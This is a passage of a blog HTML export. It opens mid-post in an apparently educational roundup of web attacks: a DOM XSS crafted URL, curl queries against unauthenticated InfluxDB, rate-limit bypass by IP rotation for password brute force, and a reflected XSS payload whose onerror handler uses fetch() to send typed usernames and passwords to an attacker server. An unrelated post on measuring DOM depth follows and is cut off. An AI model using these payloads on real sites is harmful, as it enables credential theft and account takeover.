0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Below is the vulnerable code in the application which can lead to DOM XSS.</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vy vx" data-selectable-paragraph="" id="a4aa" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content;"><span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">function</span> <span class="hljs-title.function" style="box-sizing: inherit;">getMedia</span>() {<br style="box-sizing: inherit;" /> <span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">const</span> redirectUrl = <span class="hljs-built_in" style="box-sizing: inherit; color: #5c2699;">decodeURIComponent</span>(<br style="box-sizing: inherit;" /> <span class="hljs-title.function" style="box-sizing: inherit;">getQueryString</span>(<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'redirect_uri'</span>, <span class="hljs-variable.language" style="box-sizing: inherit;">window</span>.<span class="hljs-property" style="box-sizing: inherit;">location</span>.<span class="hljs-property" style="box-sizing: inherit;">href</span>);<br style="box-sizing: inherit;" /> );<br style="box-sizing: inherit;" /> <span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">let</span> mediaQueryString= <span class="hljs-title.function" style="box-sizing: inherit;">getQueryString</span>(<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'mediaUrl'</span>, redirectUrl);<br style="box-sizing: inherit;" /> <span class="hljs-title.function" style="box-sizing: inherit;">fetch</span>(mediaQueryString).<span class="hljs-title.function" style="box-sizing: inherit;">then</span>(<span class="hljs-function" style="box-sizing: inherit;">(<span class="hljs-params" style="box-sizing: inherit; color: #5c2699;">response</span>) =></span> <span class="hljs-title.function" style="box-sizing: inherit;">populateMedia</span>(response))<br style="box-sizing: inherit;" />}<br style="box-sizing: inherit;" /></span></pre><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="37d0" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">The above script read the media url from query param and make an ajax request to server and the response from API will be rendered in the UI.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="956f" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Now with above setups the if a user access the below url, the user cannot navigate to the website again because he/she has tons of cookie values when the max allowed length for cookie value is 4000 bytes. This is cause we could write an arbitrary Javascript code in my server and the cliente goes to download that code.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="9757" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><a class="af vo" href="https://%7B%7Byour_domain%7D%7D/lo/reset?ticket=23G23P1W237MrLBGSW&redirect_uri=google.comB%3FmediaUrl%3Dhttps%3A%2F%2F%7B%7BMOCK_VICTIM_SERVICE_IP%7D%7D%3A8080" rel="noopener ugc nofollow" style="-webkit-tap-highlight-color: transparent; box-sizing: inherit;" target="_blank"><span style="font-size: medium;">https://{{YOUR_DOMAIN}}/lo/reset?ticket=23G23P1W237MrLBGSW&redirect_uri=google.comB?mediaUrl=https://{{MOCK_VICTIM_SERVICE_IP}}:8080</span></a></p><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="4191" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">Unauthenticated access to time series DB’s</h2><p class="pw-post-body-paragraph sk sl oa sm b sn ud sp sq sr ue st su sv ug sx sy sz ui tb tc td uk tf tg th nu bj" data-selectable-paragraph="" id="f34f" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">This is one of the hack hackers attempted in time series db’s such as influxDB. The root cause is the influxDB’s instance are configured without authentication protection.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="a844" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Here is how you can hack into it to get access to unprotected DB’s using curl.</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vy vx" data-selectable-paragraph="" id="c1be" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content;">// Gets list of DB<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'s<br style="box-sizing: inherit;" /><br style="box-sizing: inherit;" />curl -i -s -k -X $'</span>GET<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">' \<br style="box-sizing: inherit;" /> -H $'</span>Host: {<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">{YOUR_DB_INSTANCE}</span>}:<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">8086</span><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">' -H $'</span>User-Agent: curl/<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">7.77</span>.<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">0</span><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">' -H $'</span>Accept: */*<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">' -H $'</span>Connection: <span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">close</span><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">' \<br style="box-sizing: inherit;" /> $'</span>http:<span class="hljs-regexp" style="box-sizing: inherit; color: #0e0eff;">//</span><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">{YOUR_DB_INSTANCE}</span>:<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">8086</span>/query?db=db&<span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">q</span>=SHOW%20databases<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'<br style="box-sizing: inherit;" /><br style="box-sizing: inherit;" /><br style="box-sizing: inherit;" />// Gets list of tables in a DB.<br style="box-sizing: inherit;" /><br style="box-sizing: inherit;" /> curl -i -s -k -X $'</span>GET<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">' \<br style="box-sizing: inherit;" /> -H $'</span>Host: {<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">{YOUR_DB_INSTANCE}</span>}:<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">8086</span><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">' -H $'</span>User-Agent: curl/<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">7.77</span>.<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">0</span><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">' -H $'</span>Accept: */*<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">' -H $'</span>Connection: <span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">close</span><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">' \<br style="box-sizing: inherit;" /> $'</span>http:<span class="hljs-regexp" style="box-sizing: inherit; color: #0e0eff;">//</span><span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">{YOUR_DB_INSTANCE}</span>:<span class="hljs-number" style="box-sizing: inherit; color: #1c00cf;">8086</span>/query?db=_internal&<span class="hljs-keyword" style="box-sizing: inherit; color: #aa0d91;">q</span>=SHOW%20Measurements<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'<br style="box-sizing: inherit;" /></span></span></pre><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="a177" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Impact:</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="dbaa" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">The risk would high if the unauthenticated user has full read and write access to the DB instance.</span></p><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="ede8" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">Bruteforce attack — bypassing rate limit with IP rotation</h2><p class="pw-post-body-paragraph sk sl oa sm b sn ud sp sq sr ue st su sv ug sx sy sz ui tb tc td uk tf tg th nu bj" data-selectable-paragraph="" id="4372" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">I saw this interesting hack from the hackers where the hacker would bypass the rate limit protection and still exploit the password bruteforce attack with help of IP rotation.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="7f0d" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Normally, we use rate limit for login page as a counter measure for any malicious user accessing with random passwords via brute force. But still there is the way for Bypassing rate limit. it’s IP Rotation.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="177a" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">IP rotation is a process where IP addresses are distributed to a device at random or at scheduled intervals.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="587d" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><em class="vz" style="box-sizing: inherit;"><span style="font-size: medium;">How to setup IP rotation and reproduce brute force:</span></em></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="5d5c" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Go To AWS Account and Copy your ACCESS KEY and SECRETE KEY.<br style="box-sizing: inherit;" />Go To burp pro. Install IP Rotate and Paste the Keys.<br style="box-sizing: inherit;" />Then set the domain ( yourDomain.com)<br style="box-sizing: inherit;" />Now Enable the IP Rotation.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="8139" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><em class="vz" style="box-sizing: inherit;"><span style="font-size: medium;">Exploiting bruteforce on the login page request</span></em></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="0aa5" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">a) Now Go to your login page and login with username and password.<br style="box-sizing: inherit;" />b) Intercept the request the above request and send it to intruder<br style="box-sizing: inherit;" />c) Then select the position password<br style="box-sizing: inherit;" />d) Then go in payload add password list.<br style="box-sizing: inherit;" />Then start the attack because of no rate limit the password bruteforcing is continue and find the correct password.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="7e8f" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Impact:</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="9080" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">A malicious minded user can continually tries to brute force an account password. and Takeover the user account without user interaction.<br style="box-sizing: inherit;" />It could lead to a hacker completely taking over the user’s account as they could use this technique to bypass the rate limit and it use to fully takeover the victim password.</span></p><h2 class="ti tj oa be tk tl tm tn to tp tq tr ts sv tt tu tv sz tw tx ty td tz ua ub uc bj" data-selectable-paragraph="" id="1a63" style="background-color: white; box-sizing: inherit; color: #242424; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 1.72em 0px -0.31em;">Reflected XSS — User authentication flow</h2><p class="pw-post-body-paragraph sk sl oa sm b sn ud sp sq sr ue st su sv ug sx sy sz ui tb tc td uk tf tg th nu bj" data-selectable-paragraph="" id="9037" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">I noticed this a common scenario in many application which involves user authentication flow and of course many hackers attempt this. The scenario is on successful authentication the user claims are getting fetched from the services such as userInfoservice.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="dae9" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">Here the hacker would try to create a mock service which can return XSS payload as response and the same will be rendered in UI without sanitisation.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="a168" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">let us create a mock webhook service url ( we can leverage <a class="af vo" href="https://webhook.site/" rel="noopener ugc nofollow" style="-webkit-tap-highlight-color: transparent; box-sizing: inherit;" target="_blank">https://webhook.site/</a>) which can return the below XSS payload</span></p><pre class="uw ux uy uz va vp vq vr bo vs ba bj" style="background: rgb(249, 249, 249); border-radius: 4px; border: 1px solid rgb(229, 229, 229); box-sizing: inherit; color: #242424; font-family: source-code-pro, Menlo, Monaco, "Courier New", Courier, monospace; margin-bottom: 0px; margin-top: 56px; overflow-x: auto; padding: 32px;"><span class="vt tj oa vq b bf vu vv l vy vx" data-selectable-paragraph="" id="d77f" style="box-sizing: inherit; display: block; font-size: 14px; letter-spacing: -0.022em; line-height: 1.4; margin-bottom: -0.2em; margin-top: -0.2em; min-width: fit-content;"><span class="hljs-tag" style="box-sizing: inherit; color: #aa0d91;"><<span class="hljs-name" style="box-sizing: inherit;">img</span> <span class="hljs-attr" style="box-sizing: inherit; color: #836c28;">src</span>=<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'x'</span> <span class="hljs-attr" style="box-sizing: inherit; color: #836c28;">onerror</span>=<span class="hljs-string" style="box-sizing: inherit; color: #c41a16;">'$(\"#email\").change(function(){<br style="box-sizing: inherit;" /> fetch(\"<yourserver>?username=\" + $( this ).val());});<br style="box-sizing: inherit;" /> $(\"#password\").change(function(){fetch(\"<yourserver><br style="box-sizing: inherit;" /> ?password=\" + $( this ).val());})'</span>></span></span></pre><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="c466" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;"><a class="af vo" href="https://medium.com/%7B%7BYOUR_DOMAIN%7D%7D/login?client=SDFGFG34323&protocol=oauth2&response_type=code&redirect_uri=%7BYOUR_DOMAIN%7D%3FuserServiceUrl%3D" rel="noopener ugc nofollow" style="-webkit-tap-highlight-color: transparent; box-sizing: inherit;" target="_blank"><em class="vz" style="box-sizing: inherit;">https://{{YOUR_DOMAIN}}/login?client=SDFGFG34323&protocol=oauth2&response_type=code&redirect_uri{YOUR_DOMAIN}%3FuserServiceUrl%3D</em></a><em class="vz" style="box-sizing: inherit;"><</em><span class="sm jr" style="box-sizing: inherit; font-weight: 700;"><em class="vz" style="box-sizing: inherit;">VICTIM_WEBHOOKURL</em></span><em class="vz" style="box-sizing: inherit;">>&scope=openid%20email</em></span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="0fb6" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">With above redirected url when the user navigates to the page the XSS payload will get executed.</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="0d39" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;">I hope you liked the post and learned something new 👍. If so, please give me some applause 👏</span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="0d39" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;"><br /></span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="0d39" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;"><br /></span></p><p class="pw-post-body-paragraph sk sl oa sm b sn so sp sq sr ss st su sv sw sx sy sz ta tb tc td te tf tg th nu bj" data-selectable-paragraph="" id="0d39" style="background-color: white; box-sizing: inherit; color: #242424; font-family: source-serif-pro, Georgia, Cambria, "Times New Roman", Times, serif; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span style="font-size: medium;"><br /></span></p>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-68892115736374838102022-08-23T20:05:00.002+05:302022-08-23T20:05:34.224+05:30ShadowDOM and rootDOM - Calculate the DOM max depth and width<p><span style="background-color: white; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.06px;"><span style="color: #999999;"><i>An automated way to find the depth and width of shadowDOM/RootDOM</i></span></span></p><p><span style="background-color: white; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.06px;"><span style="color: #073763;"><br /></span></span></p><p><span style="background-color: white; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.06px;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgV7ZFpbmsG6K7DGuWBpMF40v-6gsMyrvrql4wYyTXabe8RBPbmSNm34iO8VOZfMc96KvcWAKA5vSH4HhPqaxVZsGAcJ5qi1hYGP_VeVItUQ5-RnJ5xbRcTdIFBsJWcjYNSKqhRc9kZWl8NkkEJz5Th7hxGB_2qlBt6No1qaaNtM3uUg3z8DCEikfV/s897/1_IFLQGQZRdqmStBM6vFBdCg.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="897" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgV7ZFpbmsG6K7DGuWBpMF40v-6gsMyrvrql4wYyTXabe8RBPbmSNm34iO8VOZfMc96KvcWAKA5vSH4HhPqaxVZsGAcJ5qi1hYGP_VeVItUQ5-RnJ5xbRcTdIFBsJWcjYNSKqhRc9kZWl8NkkEJz5Th7hxGB_2qlBt6No1qaaNtM3uUg3z8DCEikfV/w640-h300/1_IFLQGQZRdqmStBM6vFBdCg.png" width="640" /></a></div><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span face="sohne, "Helvetica Neue", Helvetica, Arial, sans-serif" style="background-color: white; color: #757575; font-size: 14px; text-align: center;">Find depth & width of shadowDOM / RootDOM</span><span style="background-color: white; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.06px;"><br /><span style="color: #073763;"><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><br /></span></span><p></p><p class="pw-post-body-paragraph je jf ih jg b jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb ia gi" data-selectable-paragraph="" id="8f32" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">As DOM tree grows in an excessive size, the side effect in page loading is sometimes beyond our control. The side effects will be in page runtime, memory usage, network load.</p><p class="pw-post-body-paragraph je jf ih jg b jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb ia gi" data-selectable-paragraph="" id="d19a" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Hence, we have to be carefully monitoring the DOM tree growths with a necessary automation tests to ensure that the “<span class="jg ii" style="box-sizing: inherit; font-weight: 700;">DOM Depth</span>” and “<span class="jg ii" style="box-sizing: inherit; font-weight: 700;">DOM Width</span>” are in within the threshold or optimal limit.</p><blockquote class="kr ks kt" style="background-color: white; box-shadow: rgb(41, 41, 41) 3px 0px 0px 0px inset; box-sizing: inherit; color: rgba(0, 0, 0, 0.8); font-family: medium-content-sans-serif-font, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; margin: 0px 0px 0px -20px; padding-left: 23px;"><p class="je jf ku jg b jh ji jj jk jl jm jn jo kv jq jr js kw ju jv jw kx jy jz ka kb ia gi" data-selectable-paragraph="" id="bc75" style="box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">Heey Heeey stop stop stop !!!. What is DOM Depth( should I measure in cm?? ) what is DOM Width( does DOM gains weight ? )</p></blockquote><p class="pw-post-body-paragraph je jf ih jg b jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb ia gi" data-selectable-paragraph="" id="5bc7" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;">I had this doubt too. so, Let us first understand, what is DOM Depth, DOM Width.</p><h2 class="ky kz ih bn la lb lc ld le lf lg lh li jp lj lk ll jt lm ln lo jx lp lq lr ls gi" data-selectable-paragraph="" id="b6d5" style="background-color: white; box-sizing: inherit; color: #292929; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 2.37em 0px -0.31em;">DOM Depth</h2><p class="pw-post-body-paragraph je jf ih jg b jh lt jj jk jl lu jn jo jp lv jr js jt lw jv jw jx lx jz ka kb ia gi" data-selectable-paragraph="" id="984b" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;">The DOM depth is defined by the distance the between the nested nodes to parent element . Below is an example of DOM tree with a <span class="jg ii" style="box-sizing: inherit; font-weight: 700;"><em class="ku" style="box-sizing: inherit;">DOM depth of 12</em></span></p><p><script src="https://gist.github.com/ramkrivas/e43bde69cdfcbc9b9e2da34b0bb7bf15.js"></script></p><h2 class="ky kz ih bn la lb lc ld le lf lg lh li jp lj lk ll jt lm ln lo jx lp lq lr ls gi" data-selectable-paragraph="" id="3127" style="background-color: white; box-sizing: inherit; color: #292929; font-family: sohne, "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 20px; line-height: 24px; margin: 2.37em 0px -0.31em;">DOM Width</h2><p><span style="background-color: white; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.06px;"><span style="color: #073763;"></span></span></p><p class="pw-post-body-paragraph je jf ih jg b jh lt jj jk jl lu jn jo jp lv jr js jt lw jv jw jx lx jz ka kb ia gi" data-selectable-paragraph="" id="cd9b" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 0.86em 0px -0.46em; word-break: break-word;">The DOM width is defined by the number of root level DOM nodes<br style="box-sizing: inherit;" />( which may or may not have the branches) in a DOM tree. Below is an example of DOM tree with <span class="jg ii" style="box-sizing: inherit; font-weight: 700;"><em class="ku" style="box-sizing: inherit;">DOM width of 10</em></span></p><p><script src="https://gist.github.com/ramkrivas/d24b70260adb50a01f350ef41caad3db.js"></script></p><p class="pw-post-body-paragraph je jf ih jg b jh ji jj jk jl jm jn jo jp jq jr js jt ju jv jw jx jy jz ka kb ia gi" data-selectable-paragraph="" id="190a" style="background-color: white; box-sizing: inherit; color: #292929; font-family: charter, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 20px; letter-spacing: -0.003em; line-height: 32px; margin: 2em 0px -0.46em; word-break: break-word;"><span class="jg ii" style="box-sizing: inherit; font-weight: 700;">Find the DOM Depth and Width ( based on Lighhouse logic )</span></p><p class="pw-post-body-paragraph je jf ih jg b jh lt jj jk jl lu jn jo jp lv jr js jt lw jv jw jx lx jz ka kb ia gi" 